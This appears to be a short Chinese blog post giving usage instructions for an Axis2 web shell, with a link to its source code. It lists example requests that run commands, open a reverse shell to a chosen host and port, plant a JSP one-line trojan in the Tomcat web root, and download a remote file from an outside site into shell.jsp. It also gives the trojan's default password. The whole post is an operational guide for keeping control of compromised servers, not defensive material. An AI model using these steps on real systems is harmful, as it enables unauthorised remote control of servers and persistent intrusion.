A-A+

Axis2 Web Shell

2016年04月15日 15:16 汪洋大海 暂无评论 阅读 421 views 次

axis2 web shell

使用介绍:

1、命令执行 http://1.1.1.1/services/config/exec?cmd=whoami (不说了,执行命令。注意:xml换行没有处理好)

2、反弹shell http://1.1.1.1/services/config/shell?host=1.1.1.1&port=5555 (Linux则使用bash反弹shell,Windows则会进行socket执行shell)

3、文件上传 http://1.1.1.1/services/config/upload?path=/opt/tomcat/webapps/ROOT/shell.jsp (会把resource目录下面的one.txt 写成shell.jsp,注意:全路径,带*文件名)

4、文件下载 http://1.1.1.1/services/config/download?url=http://www.ooo.com/mm.txt&path=/opt/tomcat/webapps/ROOT/shell.jsp (会把这个URL的文件写成shell.jsp,注意:全路径,带*文件名)

5、class目录查看 http://1.1.1.1/services/config/getClassPath (会显示当前class的路径,方便文件上传)

 

注意

1、相同文件名的aar文件只能上传一次,虽说是remove Service了,服务器上面的还在。想要继续使用,请rename

2、默认的jsp一句话木马是/resource/one.txt,可以自己修改。默认密码是wooyun,发布版本里面放的是one.jsp,一向鄙视伸手党

3、Linux反弹shell 会在当前目录生成一个wooyun.sh的文件,当shell断开后会自动删除

 

shell下载地址:https://github.com/Svti/Axis2Shell  作者:Sura、Rain

标签:

给我留言